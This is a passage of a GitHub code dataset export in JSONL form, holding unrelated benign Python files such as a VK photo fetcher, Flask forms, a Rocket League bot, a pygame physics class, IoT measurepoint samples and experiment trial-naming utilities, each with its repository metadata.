df.to_excel(self.path+f'{self.files[0].strip(\".csv\")}.xlsx')\r\n\r\n\r\nif __name__ == '__main__':\r\n # cluster = Classify(alg=0, file='DDR_IR_UNDER.csv')\r\n # output = cluster.main(sample_size=1000)\r\n # df = pd.DataFrame.from_dict(output)\r\n # df.to_csv(self.path+'IR_2022-01-06.csv')\r\n transform = CompileApply()\r\n transform.files = [x for x in os.listdir(out_path) if x.find(\"IR\") != -1]\r\n transform.export_list()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"nlombardi/worksamples","sub_path":"Machine Learning Sample - Multi-Cluster[wip]_2022.py","file_name":"Machine Learning Sample - Multi-Cluster[wip]_2022.py","file_ext":"py","file_size_in_byte":7116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74059123892","text":"import requests\nfrom datetime import datetime\nfrom pprint import pprint\n\n\nclass Vk:\n url = 'https://api.vk.com/method/'\n\n def __init__(self, token, version):\n self.token = token\n self.version = version\n self.params = {\n 'access_token': self.token,\n 'v': self.version\n }\n self.owner_id = requests.get(self.url + 'users.get', self.params).json()['response'][0]['id']\n\n def get_name(self, user_id=None):\n if user_id is None:\n user_id = self.owner_id\n url = self.url + 'users.get'\n params = {\n 'user_ids': user_id\n }\n response = requests.get(url, params={**self.params, **params}).json()\n return f\"{response['response'][0]['first_name']} {response['response'][0]['last_name']}\"\n\n def get_photos(self, user_id=None, count=50):\n if user_id is None:\n user_id = self.owner_id\n url = self.url + 'photos.get'\n params = {\n 'owner_id': user_id,\n 'album_id': 'profile',\n 'extended': 1,\n 'count': count\n }\n response = requests.get(url, params={**self.params, **params})\n return response.json()\n\n def max_quality(self, sizes_list):\n typ = 'a'\n max_el = {}\n for el in sizes_list:\n if el['type'] > typ:\n typ = el['type']\n max_el = el\n return max_el\n\n def read_photos(self, user_id=None, count=50):\n if user_id is None:\n user_id = self.owner_id\n\n print(f'Получаем фотографии из VK для профиля {self.get_name(user_id)} (ID={user_id})')\n\n photos = []\n vk_photos = self.get_photos(user_id, count)\n for item in vk_photos['response']['items']:\n quality_photo = self.max_quality(item['sizes'])\n\n photos.append({\n 'date': datetime.utcfromtimestamp(item['date']).strftime('%Y%m%d_%H%M%S'),\n 'likes': item['likes']['count'],\n 'url': quality_photo['url'],\n 'size': quality_photo['type']\n })\n print(f'Найдено фотографий: {len(photos)}')\n return photos\n","repo_name":"TVP-18/py-diplom-basic","sub_path":"vk.py","file_name":"vk.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10404379624","text":"from torch.optim import lr_scheduler\r\n\r\n\r\ndef get_scheduler(scheduler_str) -> object:\r\n scheduler = None\r\n\r\n if scheduler_str == 'CosineAnnealingLR':\r\n\r\n scheduler = lr_scheduler.CosineAnnealingLR\r\n\r\n elif scheduler_str == 'CosineAnnealingWarmRestarts':\r\n\r\n scheduler = lr_scheduler.CosineAnnealingWarmRestarts\r\n\r\n elif scheduler_str == \"ReduceLROnPlateau\":\r\n scheduler = lr_scheduler.ReduceLROnPlateau\r\n\r\n if scheduler is None:\r\n raise Exception(f\"'{scheduler}': This optimizer does not exist.\")\r\n return scheduler","repo_name":"co1dtype/Dacon_Text_Recognition","sub_path":"modules/schedulers.py","file_name":"schedulers.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22315845056","text":"from flask.app import Flask\nfrom flask_wtf import FlaskForm\nfrom wtforms import IntegerField, StringField, SubmitField\nfrom wtforms.fields.core import RadioField\nfrom wtforms.validators import AnyOf, InputRequired\n\nclass FieldsRequiredForm(FlaskForm):\n \"\"\"Require all fields to have content. This works around the bug that WTForms radio\n fields don't honor the `DataRequired` or `InputRequired` validators.\n \"\"\"\n\n class Meta:\n def render_field(self, field, render_kw):\n render_kw.setdefault('required', True)\n return super().render_field(field, render_kw)\n\nclass PredictDataForm(FieldsRequiredForm):\n passenger_class = RadioField('Passenger class', choices=[(1, 'First'), (2, 'Second'), (3, 'Third')], coerce=int)\n sex = RadioField('Sex', choices=[(0, 'Male'), (1, 'Female')], coerce=int)\n age = IntegerField('Age', validators=[InputRequired()])\n siblings_or_spouse = IntegerField('Number of siblings or spouses aboard', validators=[InputRequired()])\n parch = IntegerField('Number of parents or children aboard', validators=[InputRequired()])\n fare = IntegerField('Fare', validators=[InputRequired()])\n embarked = StringField('Embarked', validators=[InputRequired(), AnyOf(['cherbourg', 'queenstown', 'southampton'])])\n embarked = RadioField('Embarked', choices=[('cherbourg', 'Cherbourg'), ('queenstown', 'Queenstown') ,('southampton', 'Southampton')])\n submit = SubmitField('Submit')\n\n","repo_name":"TomekQ13/RealTimePrediction","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70127834932","text":"import funcoes\nimport os\n\nwhile True:\n print(\"\"\"\\nO que deseja fazer?\n [1] Cadastrar um novo cartão\n [2] Ver os cartões cadastrados\n [3] Excluir um cartão\n [4] Verificar Preço ideal para um produto\"\"\")\n\n while True:\n escolha = input('Escolha: ')\n try:\n escolha = int(escolha)\n break\n except ValueError as error:\n print('Digite um numero valido!')\n except Exception as error:\n print(f'Erro nao esperado. {error}')\n\n if escolha == 1:\n funcoes.add_cartao()\n\n if escolha == 2:\n try:\n print(funcoes.ver_cartoes())\n\n\n except Exception:\n print('Nao há cartoes registrados.')\n\n if escolha == 3:\n funcoes.remover_cartao()\n\n if escolha == 4:\n funcoes.venda()\n\n if escolha >4:\n print('Escolha uma opcao valida!')\n close = 0\n while True:\n fechar_programa = input('Se deseja continuar digite [S]im ou [N]ão : ').upper()\n if fechar_programa == 'S':\n break\n elif fechar_programa == 'N':\n close = 1\n break\n else:\n print('Opcao invalida')\n if close == 1:\n break\n os.system('cls')","repo_name":"Kaique-Silva-Sousa/Preco-Ideal","sub_path":"inicio.py","file_name":"inicio.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75055920691","text":"import torch\r\nimport math\r\n\r\n\r\nclass Atba:\r\n def get_action(self, spatial, car_stats):\r\n action = torch.zeros(9)\r\n\r\n left_vector = spatial[:, 10]\r\n forward_vector = spatial[:, 9]\r\n up_vector = spatial[:, 11]\r\n car_location = spatial[:, 0]\r\n ball_location = spatial[:, 2]\r\n goal_location = torch.tensor([0, 5.12, 0.3], dtype=torch.float)\r\n own_goal_location = torch.tensor([0, -5.12, 0.3], dtype=torch.float)\r\n\r\n relative_ball = ball_location - car_location\r\n ball_distance = relative_ball.norm()\r\n relative_ball /= ball_distance\r\n relative_goal = goal_location - car_location\r\n relative_goal /= relative_goal.norm()\r\n relative_own_goal = own_goal_location - car_location\r\n relative_own_goal /= relative_own_goal.norm()\r\n\r\n # offence/ defence switching\r\n\r\n offence = (1 + ball_location[1] / 5.12) / 2\r\n defence = 1 - offence\r\n\r\n ball_direction = (1 + offence * relative_ball @ relative_goal - defence * relative_ball @ relative_own_goal)/2\r\n ball_direction = pow(ball_direction, 1.4)\r\n not_ball_direction = 1 - ball_direction\r\n\r\n car_offence = (1 + car_location[1] / 5.12) / 2\r\n car_defence = 1 - car_offence\r\n\r\n # controls\r\n\r\n left_ball = relative_ball @ left_vector\r\n left_opp_goal = relative_goal @ left_vector\r\n left_own_goal = relative_own_goal @ left_vector\r\n left_goal = car_defence * left_own_goal - car_offence * left_opp_goal\r\n steer = ball_direction * left_ball + not_ball_direction * left_goal\r\n roll = ball_direction * left_goal + not_ball_direction * -left_vector[2]\r\n\r\n forward_ball = relative_ball @ forward_vector\r\n forward_opp_goal = relative_goal @ forward_vector\r\n forward_own_goal = relative_own_goal @ forward_vector\r\n forward_goal = car_defence * forward_own_goal - car_offence * forward_opp_goal\r\n pitch = ball_direction * forward_goal + not_ball_direction * forward_vector[2]\r\n\r\n up_ball = relative_ball @ up_vector\r\n jump = ball_direction * up_ball + not_ball_direction * -1\r\n throttle = ball_direction * math.copysign(pow(1 - abs(up_ball), 6), forward_ball) + not_ball_direction * 1\r\n\r\n action[0] = throttle\r\n action[1] = math.copysign(pow(abs(pitch), 2), pitch)\r\n action[2] = 1 if throttle > 0.75 else -1\r\n action[3] = 1 if abs(steer) > 0.65 else -1\r\n action[4] = jump if ball_distance < 0.4 else -1\r\n action[5] = 1 if ball_distance < 0.3 else -1\r\n action[6] = math.copysign(pow(abs(roll), 2), -roll)\r\n action[7] = math.copysign(pow(abs(steer), 0.1), steer)\r\n action[8] = math.copysign(pow(abs(steer), 0.1), steer)\r\n\r\n return action\r\n","repo_name":"LHolten/Leviathan","sub_path":"cool_atba/cool_atba.py","file_name":"cool_atba.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"22568271966","text":"from furbain import config\n\n\n# Converts hh:mm:ss time to x days x hours x minutes x seconds\ndef formatTimeToIntervalType(time):\n if time is not None and isinstance(time, str):\n time = time.split(':')\n formattedTime = \"\"\n if int(time[0]) > 23:\n formattedTime += str(int(time[0]) // 24) + \" days \"\n time[0] = int(time[0]) % 24\n \n formattedTime += f'{time[0]} hours {time[1]} minutes {time[2]} seconds'\n return formattedTime\n else:\n return None\n \n\n# Returns the time in hh:mm:ss format\ndef getFormattedTime(timeInSeconds):\n if timeInSeconds is not None:\n if isinstance(timeInSeconds, float):\n timeInSeconds = int(timeInSeconds)\n m, s = divmod(timeInSeconds, 60)\n h, m = divmod(m, 60)\n if h < 10:\n h = '0' + str(h)\n else:\n h = str(h)\n return f'{h}:{m:02d}:{s:02d}'\n else:\n return None\n\n# Receive a time in a string with 'hh:mm:ss' format and return the time in seconds (int)\ndef getTimeInSeconds(time):\n if time is not None and isinstance(time, str):\n time = time.split(':')\n return int(time[0]) * 3600 + int(time[1]) * 60 + int(time[2])\n else:\n return None\n\n# converts a list of x lists to a string and replace Angle bracket with parenthesis\n# [[[1, 2], [3,4], [5,6]]] -> \"(((1,2) (3,4) (5,6)))\"\ndef convertListToString(listToConvert):\n if isinstance(listToConvert, list):\n return \" \".join(map(convertListToString, listToConvert)) + \")\"\n else:\n return str(listToConvert)\n\n\n# format geojson polygon to a postgis polygon\ndef formatGeoJSONPolygonToPostgisPolygon(coordinates, geometryType, epsg):\n polygon = convertListToString(coordinates)\n polygon = polygon.replace(\") \", \", \")\n \n # Removing 1 level of parenthesis\n # (((1,2) (3,4) (5,6))) -> ((1,2) (3,4) (5,6))\n # this caused an error while creating the geometry\n nbEndingParenthesis = polygon.count(\")\")\n polygon = polygon[:-1]\n nbEndingParenthesis -= 1\n \n # adding nbEndingParenthesis parenthesis at the beginning\n polygon = \"(\" * nbEndingParenthesis + polygon \n polygon = geometryType + polygon\n\n return polygon\n\n\n# Return the EPSG of the geojson\n# if not found return the SRID of the database\ndef getEPSGFromGeoJSON(gjson):\n epsg = None\n dbSRID = config.getDatabaseSRID()\n \n try:\n crs = gjson['crs']['properties']['name']\n \n # get the EPSG code\n for i in crs.split(':'):\n if i.isdigit():\n epsg = int(i)\n break\n \n if epsg is None:\n raise Exception(\"No EPSG code found in the GeoJSON file\")\n elif str(epsg) != dbSRID:\n print(f\"WARNING : The EPSG code of the GeoJSON file {epsg} is different from the EPSG code of the database {dbSRID}\")\n \n\n except:\n epsg = dbSRID\n print(f\"No EPSG code found in the GeoJSON file, the EPSG code of the database will be used ({epsg})\")\n\n return epsg\n\n\ndef chunker(seq, size):\n # from http://stackoverflow.com/a/434328\n return (seq[pos:pos + size] for pos in range(0, len(seq), size))\n\n# returns the coordinates and geometry type of the geojson feature\ndef parseFeature(feature):\n coordinates = None\n geometryType = None\n \n geometry = feature[\"geometry\"]\n \n if geometry is not None:\n coordinates = geometry[\"coordinates\"]\n if coordinates is None or len(coordinates) == 0:\n coordinates = None\n else:\n geometryType = geometry[\"type\"]\n \n \n return coordinates, geometryType","repo_name":"gabRpt/matsim-output-postgreSQL-converter","sub_path":"src/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":3648,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"3615844599","text":"import pygame,math\n\ndef get_collisions(rect,platforms):\n data = []\n for platform in platforms:\n if rect.colliderect(platform):\n data.append(platform)\n return data\n\nids = 0 \n\nclass Physics:\n\n def __init__(self,x,y,width,height):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.rect = pygame.Rect(x,y,width,height)\n\n def move(self,velocity,platforms):\n collisions_data = {'left': False, 'right': False, 'top': False, 'bottom': False}\n self.rect.x += velocity[0]\n obstacles = get_collisions(self.rect,platforms)\n self.x = int(self.rect.x)\n\n for obstacle in obstacles:\n if velocity[0] > 0:\n self.rect.right = obstacle.left\n collisions_data['right'] = True\n if velocity[0] < 0:\n self.rect.left = obstacle.right\n collisions_data['left'] = True\n\n self.rect.y += velocity[1]\n obstacles = get_collisions(self.rect,platforms)\n self.y = int(self.rect.y)\n\n for obstacle in obstacles:\n if velocity[1] > 0:\n self.rect.bottom = obstacle.top\n collisions_data['bottom'] = True\n if velocity[1] < 0:\n self.rect.top = obstacle.bottom\n collisions_data['top'] = True\n\n return collisions_data\n \nclass GameObject:\n\n def __init__(self,x,y,width,height,animation_data=None,animated=False,default_animation=None,offset=[0, 0]): # animated = boolean to show if the entity is animated or not\n global ids\n ids += 1\n self.id = ids\n self.frame_no = 0\n self.animated = animated\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n self.physics = Physics(self.x,self.y,width,height)\n self.animator = Animator(self.id)\n self.current_animation = default_animation\n self.flip = [False,False]\n if animation_data != None:\n self.animator.load_animation(animation_data)\n self.rotation = 0\n self.offset = offset\n\n\n #self.physics.rect = pygame.Rect(self.physics.x + self.offset[0], self.physics.y + self.offset[1], self.width - self.offset[0], self.height - self.offset[1])\n\n def update(self,velocity,platforms, offset=[0,0], rect_size=None):\n if rect_size != None:\n self.physics.rect.size = rect_size\n collisions_data = self.physics.move(velocity,platforms)\n self.set_pos(self.physics.rect.x + offset[0], self.physics.rect.y + offset[1])\n if self.animated:\n self.frame_no = (self.frame_no + 1) % self.current_animation_frames_quantity()\n frame_index = self.get_frame()\n frame = self.current_animation_frames()[frame_index]\n return collisions_data,frame\n else:\n return collisions_data\n \n def rect_center(self):\n return self.physics.rect.center\n def get_frame(self):\n return self.frame_no\n\n def set_pos(self,x,y):\n self.x = x\n self.y = y\n def current_animation_frames_quantity(self):\n return len(self.get_frames()[self.current_animation])\n def current_animation_frames(self):\n return self.animator.frames[self.current_animation]\n\n def draw(self,surf,*scroll):\n pygame.draw.rect(surf,(255,0,0),pygame.Rect(self.physics.x - scroll[0], self.physics.y - scroll[1], *self.physics.rect.size))\n\n def display(self,image,surf,scroll_x,scroll_y):\n surf.blit(pygame.transform.flip(pygame.transform.rotate(image,self.rotation),self.flip[0],self.flip[1]),(self.x - self.offset[0] - scroll_x,self.y - self.offset[1] -scroll_y))\n\n def get_center(self):\n return self.x ,self.y\n\n def get_frames(self):\n return self.animator.get_frames()\n\n def change_animation(self,animation):\n if self.animated:\n self.frame_no = 0\n self.current_animation = animation\n self.current_animation_frames_quantity()\n self.current_animation_frames()\n \n \nclass Animator:\n\n def __init__(self,entity_id):\n self.frames = {}\n self.entity_id = entity_id\n \n def load_animation(self,animation_data): # [['run',(2,3,4,6)]]\n for data in animation_data:\n self.frames[data[0]] = []\n for i,frame_count in enumerate(data[1]):\n for j in range(frame_count):\n frame_name = data[0] + '_' + str(i)\n self.frames[data[0]].append(frame_name)\n \n return self.frames\n def get_frames(self):\n return self.frames\n \n def set_animation(self):\n pass\n def change_animation(self):\n pass\n def play(self,animation,duration):\n pass\n \n\n\n\nanimation_manager = {} # information on animation of every entity\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n","repo_name":"melonead/water-wars","sub_path":"game_entity.py","file_name":"game_entity.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35477401643","text":"from flask import Flask, render_template\nfrom flask_socketio import SocketIO,emit\nimport json,cppimport\nimport scramble\n\n\nclib = cppimport.imp(\"clib\")\n\n\napp = Flask(__name__,\n static_url_path='', \n static_folder='static',)\nsapp = SocketIO(app)\n\n@app.route(\"/room\")\ndef room():\n\treturn render_template(\"room.html\")\n\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"index.html\")\n\n\n@sapp.on('getIDR')\ndef connect(d):\n\tr = d[\"data\"]\n\tprint(f\"USED ID {r}\")\n\t\n@sapp.on('setEVN')\ndef sevn(d):\n\ti = int(d[\"id\"])\n\tevn = d[\"evn\"]\n\tclib.set_event(i,evn)\n\tprint('setEVN')\n\temit('change_event',json.dumps({\"evn\":evn,\"rid\":str(i)}),broadcast=True)\n\n@sapp.on(\"update\")\ndef handle_ge(data):\n\td = json.loads(data['data'])\n\td['id'] = str(d['id'])\n\tclib.parse(d)\n\t\n\t\n\t\n\temit(\"retupdate\",[json.dumps(clib.get(int(d[\"id\"]))),int(d[\"id\"])], broadcast=True)\n\n@sapp.on(\"newr\")\ndef handle_nr(data):\n\td = int(data['data'])\n\tclib.clear(d)\n\t\n\temit(\"retupdate\",[\"{}\",d], broadcast=True)\n\tevent = clib.get_event(d)\n\tscr = scramble.scrambled[event]()\n\temit(\"newscramb\",[scr,d],broadcast=True)\n\n\n\n\n\n\t\nsapp.run(app,host=\"0.0.0.0\")\n","repo_name":"kellantech/cuberooms","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26175736816","text":"import time\nfrom random import random\nfrom enos.core.MqttClient import MqttClient\nimport random\n\nfrom enos.message.upstream.resume.MeasurepointResumeBatchRequest import MeasurepointResumeBatchRequest\nfrom enos.message.upstream.resume.MeasurepointResumeRequest import MeasurepointResumeRequest\nfrom enos.message.upstream.status.SubDeviceLoginBatchRequest import SubDeviceLoginBatchRequest\nfrom enos.message.upstream.status.SubDeviceLoginRequest import SubDeviceLoginRequest\nfrom enos.sample.SampleHelper import SampleHelper\n\n\ndef post_measure_point_resume():\n \"\"\"this sample is to resume report one measurepoint\"\"\"\n login_sub_device_request = SubDeviceLoginRequest.builder() \\\n .set_sub_device_info(SampleHelper.SUB1_PRODUCT_KEY,\n SampleHelper.SUB1_DEVICE_KEY,\n SampleHelper.SUB1_DEVICE_SECRET) \\\n .build()\n login_sub_device_response = client.publish(login_sub_device_request)\n if login_sub_device_response:\n print('login_sub_device_response: %s' % login_sub_device_response.get_code())\n\n post_measure_point_request_resume = MeasurepointResumeRequest.builder() \\\n .set_product_key(SampleHelper.SUB1_PRODUCT_KEY).set_device_key(SampleHelper.SUB1_DEVICE_KEY) \\\n .add_measure_point('wywpoint1', random.randint(100, 200)) \\\n .add_measure_points(SampleHelper.MEASURE_POINTS) \\\n .build()\n post_measure_point_resume_response = client.publish(post_measure_point_request_resume)\n if post_measure_point_resume_response:\n print('post_measure_point_resume_response: %s' % post_measure_point_resume_response.get_code())\n\n\ndef post_measure_point_resume_batch(allow, skip):\n \"\"\"this sample is to resume report batch measurepoint\"\"\"\n login_batch_sub_device_request = SubDeviceLoginBatchRequest.builder() \\\n .add_sub_device_info(SampleHelper.SUB1_PRODUCT_KEY,\n SampleHelper.SUB1_DEVICE_KEY,\n SampleHelper.SUB1_DEVICE_SECRET) \\\n .add_sub_device_info(SampleHelper.SUB3_PRODUCT_KEY,\n SampleHelper.SUB3_DEVICE_KEY,\n SampleHelper.SUB3_DEVICE_SECRET) \\\n .build()\n login_batch_sub_device_response = client.publish(login_batch_sub_device_request)\n if login_batch_sub_device_response:\n print('login_sub_batch_response: %s' % login_batch_sub_device_response.get_code())\n\n post_measure_point_resume_requests = list()\n post_measure_point_resume_requests.append(\n MeasurepointResumeRequest.builder().set_product_key(SampleHelper.SUB_DEVICES[0].get_product_key())\n .set_device_key(SampleHelper.SUB_DEVICES[0].get_device_key())\n .add_measure_point('wywpoint2', random.randint(100, 200))\n .build())\n post_measure_point_resume_requests.append(\n MeasurepointResumeRequest.builder().set_product_key(SampleHelper.SUB_DEVICES[1].get_product_key())\n .set_device_key(SampleHelper.SUB_DEVICES[1].get_device_key())\n .add_measure_point('wywpoint1', random.randint(100, 200))\n .add_measure_points(SampleHelper.MEASURE_POINTS)\n .build())\n\n post_measure_point_resume_batch_request = MeasurepointResumeBatchRequest.builder() \\\n .add_request(post_measure_point_resume_requests[0]) \\\n .add_request(post_measure_point_resume_requests[1]) \\\n .add_requests(post_measure_point_resume_requests) \\\n .set_allow_offline_sub_device(allow) \\\n .set_skip_invalid_measurepoints(skip) \\\n .build()\n post_measure_point_resume_batch_response = client.publish(post_measure_point_resume_batch_request)\n if post_measure_point_resume_batch_response:\n print('Measurepoint_Resume_Batch_response: %s' % post_measure_point_resume_batch_response.get_code())\n print('Measurepoint_Resume_Batch_response: %s' % post_measure_point_resume_batch_response.get_message())\n\n\nif __name__ == \"__main__\":\n client = MqttClient(SampleHelper.TCP_SERVER_URL, SampleHelper.GW1_PRODUCT_KEY, SampleHelper.GW1_DEVICE_KEY,\n SampleHelper.GW1_DEVICE_SECRET)\n client.get_profile().set_auto_reconnect(True) # if connection interrupted, the client can automaticlly reconnect\n client.setup_basic_logger('INFO')\n client.connect() # connect in sync\n while True:\n post_measure_point_resume()\n timestamp = int(time.time() * 1000)\n post_measure_point_resume_batch(True, False)\n time.sleep(10)\n","repo_name":"EnvisionIot/enos-device-sdk-python","sub_path":"enos/sample/MeasurepointResumeSample.py","file_name":"MeasurepointResumeSample.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"18157745188","text":"from SessionAnalysis.utils.format_trial_dicts import format_maestro_events\n\n\n\ndef rename_stab_probe_trials(maestro_data):\n \"\"\"Kept this direct and simple rather than more general and flexible since\n hopefull I won't need to do this a lot.\n \"\"\"\n tune_names = [\"0\", \"90\", \"180\", \"270\"]\n learn_names = ['Right-Up', 'Right-Dn',\n 'Up-Rt', 'Up-Lt',\n 'Left-Up', 'Left-Dn',\n 'Down-Rt', 'Down-Lt',\n 'Dn-Rt', 'Dn-Lt']\n learn_names = [x.lower() for x in learn_names]\n found_learn = False\n no_set_name = False\n print_stab = True\n print_learn = True\n for t in maestro_data:\n if t['header']['name'] in ['90Stab', '0Stab', '180Stab','270Stab']:\n if not t['header']['UsedStab']:\n raise ValueError(\"Trial name is {0} but 'UsedStab' is {1}.\".format(t['header']['name'], t['header']['UsedStab']))\n if t['header']['name'] in [\"0\", \"90\", \"180\", \"270\"]:\n # try:\n # # This is only available in Maestro version >= 4.0\n # # print(t['header']['name'])\n # # print(t['header']['set_name'])\n # if t['header']['set_name'].lower() in learn_names:\n # found_learn = True\n # except KeyError:\n # no_set_name = True\n if t['header']['UsedStab']:\n t['header']['name'] = t['header']['name'] + \"Stab\"\n if print_stab:\n print(\"This file has stabilization but trial names do not reflect this! Added 'Stab' to tuning names.\")\n print_stab = False\n if (\"-left\" in t['header']['name']):\n old_name = t['header']['name']\n new_name = t['header']['name'].replace(\"-left\", \"-lt\")\n t['header']['name'] = new_name\n if t['header']['UsedStab']:\n if \"Stab\" not in t['header']['name']:\n t['header']['name'] = t['header']['name'] + \"Stab\"\n new_name = t['header']['name']\n if print_learn:\n print(\"This file has old learning name {0} which was changed to {1}.\".format(old_name, new_name))\n print_learn = False\n if (\"-right\" in t['header']['name']):\n old_name = t['header']['name']\n new_name = t['header']['name'].replace(\"-right\", \"-rt\")\n t['header']['name'] = new_name\n if t['header']['UsedStab']:\n if \"Stab\" not in t['header']['name']:\n t['header']['name'] = t['header']['name'] + \"Stab\"\n new_name = t['header']['name']\n if print_learn:\n print(\"This file has old learning name {0} which was changed to {1}.\".format(old_name, new_name))\n print_learn = False\n if (\"-down\" in t['header']['name']):\n old_name = t['header']['name']\n new_name = t['header']['name'].replace(\"-down\", \"-dn\")\n t['header']['name'] = new_name\n if t['header']['UsedStab']:\n if \"Stab\" not in t['header']['name']:\n t['header']['name'] = t['header']['name'] + \"Stab\"\n new_name = t['header']['name']\n if print_learn:\n print(\"This file has old learning name {0} which was changed to {1}.\".format(old_name, new_name))\n print_learn = False\n if (\"-up\" in t['header']['name']):\n # Should already be named correctly so just check Stab\n old_name = t['header']['name']\n # new_name = t['header']['name'].replace(\"-up\", \"-up\")\n # t['header']['name'] = new_name\n if t['header']['UsedStab']:\n if \"Stab\" not in t['header']['name']:\n t['header']['name'] = t['header']['name'] + \"Stab\"\n new_name = t['header']['name']\n if print_learn:\n print(\"This file has old learning name {0} which was changed to {1}.\".format(old_name, new_name))\n print_learn = False\n\n # if no_set_name:\n # print(\"File does not have set name\")\n # elif not found_learn:\n # raise ValueError(\"Could not find learning trials within the learning set names provided\")\n\n return None\n\n\ndef name_trial_events(maestro_data, is_weird_Yoda=False):\n \"\"\"Assigns the event names to event times dictionary for each trial\n IN PLACE.\n\n NOTE THAT the post learning standard tuning block in Dandy is messed up\n because it has the extra events as used for the Stab tuning!!! So these\n are explictily caught and renamed....\n \"\"\"\n\n # Set hard coded variables for expected trial name dictionaries.\n if is_weird_Yoda:\n event_names_fixation = {\n \"fixation_onset\": [2, 0]\n }\n event_names_rand_vp = {\n \"fixation_onset\": [0, 0],\n \"rand_fix_onset\": [1, 0],\n \"target_onset\": [2, 0],\n \"start_stabwin\": [3, 0],\n \"target_offset\": [4, 0]\n }\n event_names_stand_tuning = {\n \"fixation_onset\": [0, 0],\n \"rand_fix_onset\": [1, 0],\n \"target_onset\": [1, 1],\n \"target_offset\": [1, 3]\n }\n event_names_stab_tuning = {\n \"fixation_onset\": [0, 0],\n \"rand_fix_onset\": [1, 0],\n \"target_onset\": [2, 0],\n \"start_stabwin\": [3, 0],\n \"instruction_onset\": [4, 0],\n \"target_offset\": [5, 0]\n }\n event_names_learning = {\n \"fixation_onset\": [0, 0],\n \"rand_fix_onset\": [1, 0],\n \"target_onset\": [1, 1],\n \"instruction_onset\": [1, 2],\n \"target_offset\": [1, 3]\n }\n else:\n event_names_fixation = {\n \"fixation_onset\": [2, 0]\n }\n event_names_rand_vp = {\n \"fixation_onset\": [0, 0],\n \"rand_fix_onset\": [1, 0],\n \"target_onset\": [2, 0],\n \"start_stabwin\": [3, 0],\n \"target_offset\": [4, 0]\n }\n event_names_stand_tuning = {\n \"fixation_onset\": [0, 0],\n \"rand_fix_onset\": [1, 0],\n \"target_onset\": [2, 0],\n \"start_stabwin\": [3, 0],\n \"target_offset\": [4, 0]\n }\n event_names_stab_tuning = {\n \"fixation_onset\": [0, 0],\n \"rand_fix_onset\": [1, 0],\n \"target_onset\": [2, 0],\n \"start_stabwin\": [3, 0],\n \"instruction_onset\": [4, 0],\n \"target_offset\": [5, 0]\n }\n event_names_learning = {\n \"fixation_onset\": [0, 0],\n \"rand_fix_onset\": [1, 0],\n \"target_onset\": [2, 0],\n \"start_stabwin\": [3, 0],\n \"instruction_onset\": [4, 0],\n \"target_offset\": [5, 0]\n }\n\n weird_yoda_tuning_trials = ['195', '165', '210', '315', '150', '225', '45',\n '135', '255', '285', '240', '300', '120', '105',\n '75', '60']\n\n # Generate the naming dictionary for each trial name\n maestro_trial_names = set()\n for t in maestro_data:\n if t['header']['name'] not in maestro_trial_names:\n maestro_trial_names.add(t['header']['name'])\n event_names_by_trial = {}\n for t_name in maestro_trial_names:\n if \"fix\" in t_name:\n event_names_by_trial[t_name] = event_names_fixation\n elif \"RandVP\" in t_name:\n event_names_by_trial[t_name] = event_names_rand_vp\n elif (t_name in [\"0\", \"90\", \"180\", \"270\"]):\n event_names_by_trial[t_name] = event_names_stand_tuning\n elif t_name in [\"0Stab\", \"90Stab\", \"180Stab\", \"270Stab\"]:\n event_names_by_trial[t_name] = event_names_stab_tuning\n elif \"-rt\" in t_name:\n event_names_by_trial[t_name] = event_names_learning\n elif \"-up\" in t_name:\n event_names_by_trial[t_name] = event_names_learning\n elif \"-lt\" in t_name:\n event_names_by_trial[t_name] = event_names_learning\n elif \"-dn\" in t_name:\n event_names_by_trial[t_name] = event_names_learning\n elif t_name in weird_yoda_tuning_trials:\n event_names_by_trial[t_name] = event_names_stand_tuning\n else:\n raise ValueError(\"T name '{0}' not found! Names present: {1}\".format(t_name, maestro_trial_names))\n\n format_maestro_events(maestro_data, event_names_by_trial,\n missing_event=None, convert_to_ms=True)\n\n return None\n","repo_name":"njh27/LearnDirTunePurk","sub_path":"LearnDirTunePurk/format_trials.py","file_name":"format_trials.py","file_ext":"py","file_size_in_byte":8594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73877577654","text":"import sys\n\nresult = list()\n\nwhile True:\n l, p, v = map(int, sys.stdin.readline().split())\n\n if l == 0 or p == 0 or v == 0:\n break\n\n camp = l*(v//p)\n if v % p < l:\n camp += v % p\n else:\n camp += l\n\n result.append(camp)\n\nfor i in range(len(result)):\n print(\"Case %d: %d\" % (i+1, result[i]))\n","repo_name":"gangslee/Coding-Test","sub_path":"백준/210310/4976 캠핑.py","file_name":"4976 캠핑.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23457037119","text":"import csv\nimport math\nimport itertools\nfrom collections import 